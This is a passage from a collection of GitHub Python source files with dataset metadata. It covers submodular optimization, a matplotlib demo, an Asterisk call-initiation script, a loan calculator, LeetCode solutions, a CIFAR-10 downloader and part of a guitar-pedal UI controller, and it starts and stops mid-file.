Y_prev_set_info.current_set:\n raise Exception(\"both sets should be equal\")\n\n if self.debug:\n print(\"-- finished iteration --\")\n print(\"X_prev --> size:\", X_prev_set_info.current_set_size, \", f(X_prev):\", func_info_X_prev.func_value)\n print(\"Y_prev --> size:\", Y_prev_set_info.current_set_size, \", f(Y_prev):\", func_info_Y_prev.func_value)\n print(\"obj val local optimum:\", str(func_info_X_prev.func_value))\n return X_prev_set_info, func_info_X_prev\n","repo_name":"joschout/SubmodularMaximization","sub_path":"submodmax/value_reuse/abstract_double_greedy_search.py","file_name":"abstract_double_greedy_search.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"5438528143","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 7 12:41:12 2017\n\n@author: ksagilop\n\nSimple Graphs Tutorial using pylab\n\"\"\"\n# Modules\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Data\nx = [0,1,2,3,4,5]\ny = [3,10,15,17,22,23]\nz = [4,7,2,21,15,18]\nk = [10,15,45,12,30,85]\nm = [10,52,60,30,80,125]\n\n# Plot\nplt.title('Simple Graph Line example')\nplt.xlabel('This is label x')\nplt.ylabel('This is label y')\n#pl.axis([-1,5,-1,25])\nplt.scatter(x,y, c=m, s=k, label='label 1')\nplt.scatter(x,z, s=k, label='label 2')\n#pl.plot(x,z, 'ro', label='set 2')\nplt.legend(title='La Leyenda')\nplt.show()\n\n# Or\n#pl.plot(x,y, color='green', linestyle='dashed', marker='o',\n# markerfacecolor='blue', markersize=12)\n#pl.show()\n","repo_name":"pandastrail/InfoEng","sub_path":"scripting/exercises/p02_7.py","file_name":"p02_7.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28954825566","text":"from multiprocessing import Pool\nimport threading\nimport ast\nfrom asterisk.ami import AMIClient\nfrom asterisk.ami import SimpleAction\nfrom application_util import product_operation, caller_operation\nfrom custome_audio_generation import generate_audio\nfrom database_util import application_db\n\n\"\"\" update the channel dedtails once the call initiated \"\"\"\n\n\ndef update_channel_detail_call_initiated():\n\n available_channels_details = application_db.get_available_channels()\n\n available_channel = available_channels_details[\"available_channel\"]\n running_channel = available_channels_details[\"running_channel\"]\n\n available_channel = available_channel - 1\n running_channel = running_channel + 1\n\n application_db.update_channel_details(available_channel, running_channel)\n\n return True\n\n\n\"\"\" call initaition from SPI server \"\"\"\n\n\ndef call_initiation(transaction_id, mobile_no, product_type, prefix, context=\"0009\"):\n try:\n client = AMIClient(address='10.101.1.184', port=5038)\n client.login(username='gihosp', secret='gihosp123')\n\n action = SimpleAction(\n 'Originate',\n Channel=\"local/\"+\"6\"+mobile_no+\"@from-internal\",\n Context=\"GIVoice\",\n Exten=context,\n Priority=1,\n Account=product_type,\n CallerID=transaction_id,\n Async=\"yes\",\n Timeout=50000\n )\n future = client.send_action(action)\n response = future.response\n\n update_channel_detail_call_initiated()\n return True\n except Exception as ex:\n raise Exception(\n \"SIP server is down .. please check eject error {}\".format(str(ex)))\n return True\n\n\ndef customer_data_call_initiation_process(customer_datas, prefix):\n\n try:\n threads = []\n for index, customer_data in enumerate(customer_datas):\n input_list = []\n '''parse the product details from customer data'''\n #caller_data = customer_data.decode().split(\"$$$\")\n\n caller_data = customer_data\n\n transaction_id = str(caller_data[0])\n mobile_no = str(caller_data[2])\n language = str(caller_data[3]).strip()\n product_type = str(caller_data[16])\n\n split_def_product_type = product_type.split()\n\n product_type = product_type.replace(\" \", \"_\")\n\n try:\n sub_product = split_def_product_type[0] + \\\n \"_\" + split_def_product_type[1]\n except:\n sub_product = product_type\n\n product = split_def_product_type[0]\n\n ''' insert new caller data while call initiation '''\n if caller_operation.insert_new_caller_data(transaction_id, caller_data):\n\n ''' get product config details via customer product '''\n product_config = product_operation.get_product_config(product)\n\n ''' if product is active status means it will initiate the call '''\n if product_config[\"status\"] == 1:\n\n ''' check to create custome audio '''\n if product_config[\"is_call_initiate_custome_audio\"] == 1:\n\n ''' generate custome audio while call initiazation itself'''\n generate_audio.generic_audio_generation(\n product_config[\"question_flow\"], transaction_id, language, caller_data)\n\n # call_initiation(transaction_id, mobile_no,\n # product_type, prefix, product_config[\"context\"])\n\n # t = threading.Thread(target=call_initiation, args=(transaction_id, mobile_no,\n # product_type, prefix, product_config[\"context\"]),)\n # threads.append(t)\n # t.start()\n input_list.append(transaction_id)\n input_list.append(mobile_no)\n input_list.append(product_type)\n input_list.append(prefix)\n input_list.append(product_config[\"context\"])\n threads.append(input_list)\n else:\n return False\n else:\n return False\n\n pool = Pool(processes=3)\n pool.starmap(call_initiation, threads)\n pool.close()\n return True\n except Exception as ex:\n return False\n","repo_name":"NarasimmanSaravana1994/Generic-Voice-Bot","sub_path":"application_util/call_initiation.py","file_name":"call_initiation.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33417820796","text":"from matplotlib import pyplot\n\ndef get_loan_info():\n \"\"\"Get the basic information of a loan and store it in a dictionary\"\"\"\n #Create a blank dict to represent a loan\n loan = {}\n \n #Get user input for the categories of the loan\n loan['principal'] = float(input(\"Enter the loan amount: \"))\n loan['rate'] = float(input(\"Enter the interest rate: \"))/100\n loan['monthly payment'] = float(input(\"Enter the desired monthly payment amount: \"))\n loan['money paid'] = 0\n \n return loan\n \n \ndef show_loan_info(loan, number):\n \"\"\"Display the current loan status\"\"\"\n print(\"\\n----Loan information after \" + str(number) + \" months----\")\n for key, value in loan.items():\n print(key.title() + \": \" + str(value))\n \n \ndef collect_interest(loan):\n \"\"\"Update loan for interest per month\"\"\"\n #Divide by 12 to simulate collecting interest monthly\n loan['principal'] = loan['principal'] + loan['principal']*loan['rate']/12\n\ndef make_monthly_payment(loan):\n \"\"\"Simulate making a monthly payment to pay down the principal\"\"\"\n loan['principal'] = loan['principal'] - loan['monthly payment']\n \n #You are required to make a full payment this month, you have not yet payed off your loan\n if loan['principal'] > 0:\n loan['money paid'] += loan['monthly payment']\n #You are not required to make a full payment this month, you have payed off your loan\n else:\n #For this else block, loan['principal'] will be negative\n loan['money paid'] += loan['monthly payment'] + loan['principal']\n loan['principal'] = 0\n\n\ndef summarize_loan(loan, number, initial_principal):\n \"\"\"Display the results of paying off the loan\"\"\"\n print(\"\\nCongraulations! You paid off your loan in \" + str(number) + \"months!\")\n print(\"Your initial loan was $\" + str(initial_principal) + \" at a rate of \"+ str(100*loan['rate']) + \"%.\")\n print(\"Your monthly payment was $\" + str(loan['monthly payment']) + \".\")\n print(\"You spent $\" + str(round(loan['money paid'], 2)) + \" in total.\")\n\n #Calculate money spent on interest\n interest = round(loan['money paid'] - initial_principal, 2)\n print(\"You spent $\" + str(interest) + \" on interest!\")\n\ndef create_graph(data, loan):\n \"\"\"Create a graph to show the relationship between principal and time\"\"\"\n x_values = [] #These represent month numbers\n y_values = [] #These represent corresponding principal values\n \n #Loop through data set. Point is a tuple.\n #point[0] represents a month number, point[1] represents a principal value.\n for point in data:\n x_values.append(point[0])\n y_values.append(point[1])\n \n #Create a plot for x_values and y_values (month number and principal)\n pyplot.plot(x_values, y_values)\n pyplot.title(str(100*loan['rate']) + \"% Interest With $\" + str(loan['monthly payment']) + \" Monthly Payment\")\n pyplot.xlabel(\"Month Number\")\n pyplot.ylabel(\"Principal of Loan\")\n \n #Display the created graph\n pyplot.show()\n","repo_name":"Sarvesh-SP/loanCalculatorApp","sub_path":"loanFunc.py","file_name":"loanFunc.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725447594","text":"class Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n #If its empty return 0\n if not nums:\n return 0\n # Sort array in order\n nums=sorted(nums)\n # Overall longest Sequence\n longestSequence=1\n # Current Longest Sequence\n currSequence=1\n #For each in nums starting at 1 \n for index, value in enumerate(nums[1:], start=1):\n #Check to see if it is the same as the previous number\n #If it is continue to next iteration\n if value==nums[index-1]:\n continue\n #Check to see if it is adding to the sequence and increments currentSequence\n elif value==nums[index-1]+1:\n currSequence+=1\n #Else reset the current sequence\n else:\n currSequence=1\n #Finally update longestSequence if currSequence is larger\n longestSequence=max(currSequence,longestSequence)\n\n return longestSequence","repo_name":"haydentinker/LeetCode","sub_path":"0128-longest-consecutive-sequence/0128-longest-consecutive-sequence.py","file_name":"0128-longest-consecutive-sequence.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27934479160","text":"# 利用栈找对应括号,遇到左括号则进栈,遇到右括号则出栈,判断两个括号是否匹配\nclass Solution(object):\n def isValid(self, s):\n left, right = '([{', '}])'\n stack = []\n for i in s:\n if i in left:\n stack.append(i)\n if i in right:\n if not stack:\n return False\n res = stack.pop()\n if (i==')' and res!='(') or (i==']' and res!='[') or (i=='}' and res!='{'):\n return False\n return not stack","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/020.有效的括号.py","file_name":"020.有效的括号.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"25541473901","text":"import os\nimport sys\nimport urllib.request\nimport tarfile\n\nDATA_URL = 'https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'\n\ndef maybe_download_and_extract(data_dir='data'):\n dest_directory = data_dir\n os.makedirs(dest_directory, exist_ok=True)\n filename = DATA_URL.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n\n if not os.path.exists(filepath):\n def _progress(count, block_size, total_size):\n sys.stdout.write('\\r>> Downloading {} {:.2%}%'.format(\n filename, float(count * block_size) / float(total_size) * 100.0))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)\n statinfo = os.stat(filepath)\n print('\\nSuccessfully downloaded', filename, statinfo.st_size, 'bytes.')\n\n extracted_dir_path = os.path.join(dest_directory, 'cifar-10-batches-bin')\n if not os.path.exists(extracted_dir_path):\n tarfile.open(filepath, 'r:gz').extractall(dest_directory)\n","repo_name":"PauloKeller/AI","sub_path":"Learn-Artificial-Intelligence-with-TensorFlow/section-2/cifar10_input.py","file_name":"cifar10_input.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28690533069","text":"import sys, time, json, os.path, os, subprocess, queue, threading, traceback, glob\nimport shutil\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nfrom signal import signal, SIGINT, SIGTERM\nfrom time import sleep\nfrom sys import exit\nfrom collections import OrderedDict\nfrom enum import Enum, IntEnum\nimport urllib.parse\nfrom pathlib import Path\n# import random\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtCore import QObject, QUrl, Slot, QStringListModel, Property, Signal, QTimer, QThreadPool, QRunnable, qWarning, qCritical, qDebug\nfrom PySide2.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PySide2.QtGui import QIcon, QFontDatabase, QFont\n# # compiled QML files, compile with pyside2-rcc\n# import qml.qml\n# profiler\n# from PySide2.QtQml import QQmlDebuggingEnabler\n# debug = QQmlDebuggingEnabler()\n\nsys._excepthook = sys.excepthook\ndef exception_hook(exctype, value, tb):\n debug_print(\"except hook 1 got a thing!\") #, exctype, value, traceback)\n traceback.print_exception(exctype, value, tb)\n sys._excepthook(exctype, value, tb)\n sys.exit(1)\nsys.excepthook = exception_hook\n\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nimport icons.icons\n# #, imagine_assets\nimport resource_rc\n\nimport properties\n\nimport ingen_wrapper\nimport pedal_hardware\nimport module_info\nfrom static_globals import IS_REMOTE_TEST\nimport loopler as loopler_lib\nimport module_browser_model\nimport preset_browser_model\nimport amp_browser_model\nimport ir_browser_model\n\nworker_pool = QThreadPool()\nEXIT_PROCESS = [False]\nui_messages = queue.Queue()\n\ncurrent_source_port = None\ncurrent_sub_graph = \"/main/sub1/\"\nsub_graphs = set([\"/main/sub1\"])\n# current_effects = OrderedDict()\ncurrent_effects = {}\n# current_effects[\"delay1\"] = {\"x\": 20, \"y\": 30, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\n# current_effects[\"delay2\"] = {\"x\": 250, \"y\": 290, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\nport_connections = {} # key is port, value is list of ports\ncurrent_patchbay_mode = 0\ncurrent_selected_effect = \"\"\nfootswitch_assignments = {}\nlooper_footswitch_assignments = {}\npreset_started_loading_time = 0\n\ndef reset_footswitch_assignments():\n global footswitch_assignments\n footswitch_assignments = {\"a\":set(), \"b\":set(), \"c\":set(), \"d\":set(), \"e\":set()}\n\nreset_footswitch_assignments()\n\ndef reset_looper_footswitch_assignments():\n global looper_footswitch_assignments\n looper_footswitch_assignments = {\"a\":[], \"b\":[], \"c\":[], \"d\":[], \"e\":[]}\n\nreset_looper_footswitch_assignments()\n\nclass PatchMode(IntEnum):\n SELECT = 0\n MOVE = 1\n CONNECT = 2\n SLIDERS = 3\n DETAILS = 4\n HOLD = 5\n\ncontext = None\namp_browser_model_s = None\n\ndef debug_print(*args, **kwargs):\n pass\n # print( \"From py: \"+\" \".join(map(str,args)), **kwargs)\n\n\neffect_type_maps = module_info.effect_type_maps\n\neffect_prototypes_models_all = module_info.effect_prototypes_models_all\n\nfor k, v in effect_prototypes_models_all.items():\n n = 0\n for p in v[\"inputs\"].values():\n if p[1] == \"CVPort\":\n n = n + 1\n effect_prototypes_models_all[k][\"num_cv_in\"] = n\n\neffect_prototypes_models = {\"beebo\": {k:effect_prototypes_models_all[k] for k in effect_type_maps[\"beebo\"].keys()}}\n\nfor k in effect_prototypes_models.keys():\n effect_prototypes_models[k][\"input\"] = {\"inputs\": {},\n \"outputs\": {\"output\": [\"in\", \"AudioPort\"]},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"output\"] = {\"inputs\": {\"input\": [\"out\", \"AudioPort\"]},\n \"outputs\": {},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"midi_input\"] = {\"inputs\": {},\n \"outputs\": {\"output\": [\"in\", \"AtomPort\"]},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"midi_output\"] = {\"inputs\": {\"input\": [\"out\", \"AtomPort\"]},\n \"outputs\": {},\n \"num_cv_in\": 0,\n \"controls\": {}}\n\nbare_output_ports = (\"output\", \"midi_output\", \"loop_common_in\", \"loop_extra_midi\")\nbare_input_ports = (\"input\", \"midi_input\", \"loop_common_out\", \"loop_midi_out\")\nbare_ports = bare_output_ports + bare_input_ports\nloopler_modules = [\"loop_common_in\", \"loop_common_out\", \"loop_extra_midi\", \"loop_midi_out\"]\n\n\ndef clamp(v, min_value, max_value):\n return max(min(v, max_value), min_value)\n\ndef insert_row(model, row):\n j = len(model.stringList())\n model.insertRows(j, 1)\n model.setData(model.index(j), row)\n\ndef remove_row(model, row):\n i = model.stringList().index(row)\n model.removeRows(i, 1)\n\npreset_list = []\npreset_list_model = QStringListModel(preset_list)\nhardware_info = {}\ndef load_preset_list():\n global preset_list\n try:\n with open(\"/mnt/pedal_state/beebo_preset_list.json\") as f:\n preset_list = json.load(f)\n except:\n preset_list = [\"file:///mnt/presets/beebo/Empty.ingen\"]\n preset_list_model.setStringList(preset_list)\n\ntry:\n with open(\"/pedal_state/hardware_info.json\") as f:\n hardware_info = json.load(f)\n hardware_info[\"revision\"]\nexcept:\n hardware_info = {\"revision\": 10, \"pedal\": \"beebo\"}\n\nif hardware_info[\"pedal\"] == \"digit\":\n hardware_info[\"pedal\"] = \"beebo\"\n\nclass MyEmitter(QObject):\n # setting up custom signal\n done = Signal(int)\n stdout = Signal(str)\n\nclass MyWorker(QRunnable):\n\n def __init__(self, command, after=None):\n super(MyWorker, self).__init__()\n self.command = command\n self.after = after\n self.emitter = MyEmitter()\n\n def run(self):\n # run subprocesses, grab output\n ret_var = subprocess.run(self.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, shell=True)\n if self.after is not None:\n self.after()\n self.emitter.done.emit(ret_var.returncode)\n self.emitter.stdout.emit(ret_var.stdout+ret_var.stderr)\n\nclass MyTask(QRunnable):\n\n def __init__(self, delay, command):\n super(MyTask, self).__init__()\n self.command = command\n self.delay = delay\n self.emitter = MyEmitter()\n\n def run(self):\n # run subprocesses, grab output\n time.sleep(self.delay)\n ret_var = self.command()\n self.emitter.done.emit(ret_var)\n\nclass PolyBool(QObject):\n # name, min, max, value\n def __init__(self, startval=False):\n QObject.__init__(self)\n self.valueval = startval\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n self.valueval = val\n self.value_changed.emit()\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(bool, readValue, setValue, notify=value_changed)\n\nclass PolyStr(QObject):\n # name, min, max, value\n def __init__(self, startval=False):\n QObject.__init__(self)\n self.valueval = startval\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n self.valueval = val\n self.value_changed.emit()\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(str, readValue, setValue, notify=value_changed)\n\nclass PatchBayNotify(QObject):\n\n def __init__(self):\n QObject.__init__(self)\n\n add_module = Signal(str)\n remove_module = Signal(str)\n loading_preset = Signal(bool)\n loading_preset_done = Signal(str)\n\n\n# class PolyEncoder(QObject):\n# # name, min, max, value\n# def __init__(self, starteffect=\"\", startparameter=\"\"):\n# QObject.__init__(self)\n# self.effectval = starteffect\n# self.parameterval = startparameter\n# self.speed = 1\n# self.value = 1\n\n# def readEffect(self):\n# return self.effectval\n\n# def setEffect(self,val):\n# self.effectval = val\n# self.effect_changed.emit()\n\n# @Signal\n# def effect_changed(self):\n# pass\n\n# effect = Property(str, readEffect, setEffect, notify=effect_changed)\n\n# def readParameter(self):\n# return self.parameterval\n\n# def setParameter(self,val):\n# self.parameterval = val\n# self.parameter_changed.emit()\n\n# @Signal\n# def parameter_changed(self):\n# pass\n\n# parameter = Property(str, readParameter, setParameter, notify=parameter_changed)\n\nclass PolyValue(QObject):\n # name, min, max, value\n def __init__(self, startname=\"\", startval=0, startmin=0, startmax=1, v_type=\"float\", curve_type=\"lin\", startcc=-1):\n QObject.__init__(self)\n self.nameval = startname\n self.valueval = startval\n self.defaultval = startval\n self.rminval = startmin\n self.rmax = startmax\n self.ccval = startcc\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n # clamp values\n self.valueval = clamp(val, self.rmin, self.rmax)\n self.value_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(float, readValue, setValue, notify=value_changed)\n\n def readDefaultValue(self):\n return self.defaultval\n\n def setDefaultValue(self,val):\n # clamp values\n self.defaultval = clamp(val, self.rmin, self.rmax)\n self.default_value_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def default_value_changed(self):\n pass\n\n default_value = Property(float, readDefaultValue, setDefaultValue, notify=default_value_changed)\n\n def readCC(self):\n return self.ccval\n\n def setCC(self,val):\n self.ccval = val\n self.cc_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def cc_changed(self):\n pass\n\n cc = Property(float, readCC, setCC, notify=cc_changed)\n\n def readName(self):\n return self.nameval\n\n def setName(self,val):\n self.nameval = val\n self.name_changed.emit()\n\n @Signal\n def name_changed(self):\n pass\n\n name = Property(str, readName, setName, notify=name_changed)\n\n def readRMin(self):\n return self.rminval\n\n def setRMin(self,val):\n self.rminval = val\n self.rmin_changed.emit()\n\n @Signal\n def rmin_changed(self):\n pass\n\n rmin = Property(float, readRMin, setRMin, notify=rmin_changed)\n\n def readRMax(self):\n return self.rmaxval\n\n def setRMax(self,val):\n self.rmaxval = val\n self.rmax_changed.emit()\n\n @Signal\n def rmax_changed(self):\n pass\n\n rmax = Property(float, readRMax, setRMax, notify=rmax_changed)\n\ndef jump_to_preset(is_inc, num, initial=False):\n\n if is_loading.value == True:\n return\n # TODO need to call frontend function to jump to home page\n before_change_preset_num = current_preset.value\n p_list = preset_list_model.stringList()\n preset_load_counter.value = preset_load_counter.value + 1\n if is_inc:\n current_preset.value = (current_preset.value + num) % len(p_list)\n else:\n if num < len(p_list):\n current_preset.value = num\n else:\n return\n if before_change_preset_num == current_preset.value and not initial:\n debug_print(\"already on preset, not jumping \", p_list[current_preset.value], \"num is\", num)\n else:\n debug_print(\"jumping to preset \", p_list[current_preset.value], \"num is\", num)\n knobs.ui_load_preset_by_name(p_list[current_preset.value])\n\ndef write_pedal_state():\n if IS_REMOTE_TEST:\n return\n with open(\"/mnt/pedal_state/state.json\", \"w\") as f:\n json.dump(pedal_state, f)\n os.sync()\n\ndef write_preset_meta_cache(initial=False):\n with open(\"/mnt/pedal_state/preset_meta.json\", \"w\") as f:\n json.dump(preset_meta_data, f)\n os.sync()\n if not initial:\n preset_browser_model_s.update_preset_meta(preset_meta_data)\n\ndef load_preset_meta_cache():\n global preset_meta_data\n try:\n with open(\"/mnt/pedal_state/preset_meta.json\") as f:\n preset_meta_data = json.load(f)\n if len(preset_meta_data) < 3: # at least some elements\n try:\n get_meta_from_files(True)\n except:\n preset_meta_data = {}\n except:\n try:\n get_meta_from_files(True)\n except:\n preset_meta_data = {}\n\ndef write_favourites_data():\n with open(\"/mnt/pedal_state/favourites.json\", \"w\") as f:\n json.dump(favourites, f)\n os.sync()\n\ndef load_favourites_data():\n global favourites\n try:\n with open(\"/mnt/pedal_state/favourites.json\") as f:\n favourites = json.load(f)\n except:\n favourites = {\"modules\":{}, \"presets\":{}}\n\n\ndef load_pedal_state():\n global pedal_state\n try:\n with open(\"/mnt/pedal_state/state.json\") as f:\n pedal_state = json.load(f)\n if \"input_level\" not in pedal_state:\n pedal_state[\"input_level\"] = 0\n if \"midi_channel\" not in pedal_state:\n pedal_state[\"midi_channel\"] = 1\n if \"author\" not in pedal_state:\n pedal_state[\"author\"] = \"poly player\"\n if \"thru\" not in pedal_state:\n pedal_state[\"thru\"] = True\n if \"invert_enc\" not in pedal_state:\n pedal_state[\"invert_enc\"] = False\n if \"screen_flipped\" not in pedal_state:\n pedal_state[\"screen_flipped\"] = False\n if \"l_to_r\" not in pedal_state:\n pedal_state[\"l_to_r\"] = False\n if \"d_is_tuner\" not in pedal_state:\n pedal_state[\"d_is_tuner\"] = True\n except:\n pedal_state = {\"input_level\": 0, \"midi_channel\": 1, \"author\": \"poly player\",\n \"model\": \"beebo\", \"thru\": True, \"invert_enc\": False, \"screen_flipped\": False, \"l_to_r\": False,\n \"d_is_tuner\": True}\n\n\nselected_source_effect_ports = QStringListModel()\nselected_source_effect_ports.setStringList([\"val1\", \"val2\"])\nselected_dest_effect_ports = QStringListModel()\nselected_dest_effect_ports.setStringList([\"val1\", \"val2\"])\nseq_num = 10\n\nsub_graph_suffix = 0\ndef add_inc_sub_graph(actually_add=True):\n global sub_graph_suffix\n sub_graph_suffix = sub_graph_suffix + 1\n name = \"/main/sub\"+str(sub_graph_suffix)+\"/\"\n global current_sub_graph\n current_sub_graph = name\n sub_graphs.add(name.rstrip(\"/\"))\n if actually_add:\n add_sub_graph(name)\n return name\n\ndef add_sub_graph(name):\n ingen_wrapper.add_sub_graph(name.rstrip(\"/\"))\n global current_sub_graph\n current_sub_graph = name\n sub_graphs.add(name.rstrip(\"/\"))\n\ndef delete_sub_graph(name):\n name = name.rstrip(\"/\")\n if name in sub_graphs:\n ingen_wrapper.remove_plugin(name)\n sub_graphs.remove(name)\n\ndef loopler_in_use():\n # debug_print(\"checking if loopler is in use\", current_effects.keys())\n num_modules = 0\n for effect in current_effects.values():\n if effect[\"effect_type\"] in loopler_modules:\n num_modules = num_modules + 1\n return num_modules\n\n\ndef load_preset(name, initial=False, force=False):\n if is_loading.value == True and not force:\n return\n is_loading.value = True\n global preset_started_loading_time\n preset_started_loading_time = time.perf_counter()\n # is_loading.value = True\n # delete existing blocks\n port_connections.clear()\n reset_footswitch_assignments()\n knobs.spotlight_entries = []\n preset_description.name = \"Tap here to enter preset description\"\n to_delete = list(current_effects.keys())\n for effect_id in to_delete:\n if effect_id in [\"/main/out_1\", \"/main/out_2\", \"/main/out_3\", \"/main/out_4\", \"/main/in_1\", \"/main/in_2\", \"/main/in_3\", \"/main/in_4\"]:\n pass\n else:\n patch_bay_notify.remove_module.emit(effect_id)\n try:\n current_effects.pop(effect_id)\n except:\n pass\n if not initial:\n # debug_print(\"deleting sub graph\", current_sub_graph)\n delete_sub_graph(current_sub_graph)\n if loopler.is_running:\n loopler.stop_loopler()\n reset_looper_footswitch_assignments()\n add_inc_sub_graph(False)\n # debug_print(\"adding inc sub graph\", current_sub_graph)\n ingen_wrapper.load_pedalboard(name, current_sub_graph.rstrip(\"/\"))\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n context.setContextProperty(\"portConnections\", port_connections)\n # if this preset has a looper config, load it\n # check if preset file exists\n\n loopler_file = name[len(\"file://\"):].rsplit(\"/\", 1)[0] + \"/loopler.slsess\"\n debug_print(\"checking if loopler_file exists\", loopler_file)\n if os.path.exists(loopler_file):\n loopler.session_file = loopler_file\n debug_print(\"it does\", loopler_file)\n time.sleep(0.1)\n ingen_wrapper.get_state(\"/engine\")\n\ndef from_backend_new_effect(effect_name, effect_type, x=20, y=30, is_enabled=True):\n # called by engine code when new effect is created\n # debug_print(\"from backend new effect\", effect_name, effect_type)\n if effect_type in effect_prototypes:\n broadcast_ports = {}\n if \"broadcast_ports\" in effect_prototypes[effect_type]:\n broadcast_ports = {k : PolyValue(*v) for k,v in effect_prototypes[effect_type][\"broadcast_ports\"].items()}\n current_effects[effect_name] = {\"x\": x, \"y\": y, \"effect_type\": effect_type,\n \"controls\": {k : PolyValue(*v) for k,v in effect_prototypes[effect_type][\"controls\"].items()},\n \"assigned_footswitch\": PolyStr(\"\"),\n \"broadcast_ports\" : broadcast_ports,\n \"enabled\": PolyBool(is_enabled)}\n # insert in context or model? \n # emit add signal\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n patch_bay_notify.add_module.emit(effect_name)\n # if loopler isn't already running, start it\n if effect_type in loopler_modules:\n if not loopler.is_running:\n loopler.start_loopler()\n # if effect_type == \"midi_clock_in\":\n # # set broadcast on port\n # ingen_wrapper.set_broadcast(effect_name+\"/bpm\", True)\n # if effect_type == \"tuner\": # tuner starts bypassed\n # knobs.set_bypass(effect_name, False)\n else:\n debug_print(\"### backend tried to add an unknown effect!\")\n\ndef from_backend_remove_effect(effect_name):\n # called by engine code when effect is removed\n if effect_name not in current_effects:\n return\n effect_type = current_effects[effect_name][\"effect_type\"]\n debug_print(\"### from backend removing effect\")\n\n # if we're in spotlight, remove from spotlight\n if len([[k, v, v2] for k,v,v2 in knobs.spotlight_entries if k == effect_name]) > 0:\n\n for spotlight_entry in knobs.spotlight_entries:\n if spotlight_entry[0] == effect_name:\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n knobs.spotlight_entries = [[k, v, v2] for k,v, v2 in knobs.spotlight_entries if k != effect_name]\n # emit remove signal\n for source_port, targets in list(port_connections.items()):\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n if s_effect == effect_name:\n del port_connections[source_port]\n else:\n port_connections[source_port] = [[e, p] for e, p in port_connections[source_port] if e != effect_name]\n\n # if this was a looper module, check if there are any left\n if effect_type in loopler_modules:\n if loopler_in_use() <= 1:\n if loopler.is_running:\n loopler.stop_loopler()\n reset_looper_footswitch_assignments()\n patch_bay_notify.remove_module.emit(effect_name)\n for k in footswitch_assignments.keys(): # if this module has a foot switch assigned to it\n footswitch_assignments[k].discard(effect_name)\n # debug_print(\"removing effects, current keys\", current_effects.keys())\n\n # current_effects.pop(effect_name) # done after UI removes it\n context.setContextProperty(\"portConnections\", port_connections)\n ingen_wrapper.get_state(\"/engine\")\n # debug_print(\"### from backend removing effect setting portConnections\")\n update_counter.value+=1\n\ndef from_backend_add_connection(head, tail):\n # debug_print(\"head \", head, \"tail\", tail)\n current_source_port = head\n if current_source_port.rsplit(\"/\", 1)[0] in sub_graphs:\n s_effect = current_source_port\n # debug_print(\"## s_effect\", s_effect)\n if s_effect not in current_effects:\n return\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n if s_effect_type in bare_output_ports:\n s_port = \"input\"\n elif s_effect_type in bare_input_ports:\n s_port = \"output\"\n current_source_port = s_effect + \"/\" + s_port\n # debug_print(\"## current_source_port\", current_source_port)\n else:\n if current_source_port.rsplit(\"/\", 1)[0] == \"/main\":\n return\n # debug_print(\"## current_source_port not in sub graph\", current_source_port, sub_graphs)\n\n\n effect_id_port_name = tail.rsplit(\"/\", 1)\n if effect_id_port_name[0] in sub_graphs :\n t_effect = tail\n if t_effect not in current_effects:\n return\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n t_port = None\n if t_effect_type in bare_output_ports:\n t_port = \"input\"\n elif t_effect_type in bare_input_ports:\n t_port = \"output\"\n # debug_print(\"## tail in sub_graph\", tail, t_effect, t_port)\n if t_port is None:\n return\n else:\n if effect_id_port_name[0] == \"/main\":\n return\n # print(\"effect_id_port_name\", effect_id_port_name)\n t_effect, t_port = effect_id_port_name\n # debug_print(\"## tail not in sub_graph\", tail, t_effect, t_port, sub_graphs)\n if t_effect not in current_effects:\n return\n\n if current_source_port not in port_connections:\n port_connections[current_source_port] = []\n if [t_effect, t_port] not in 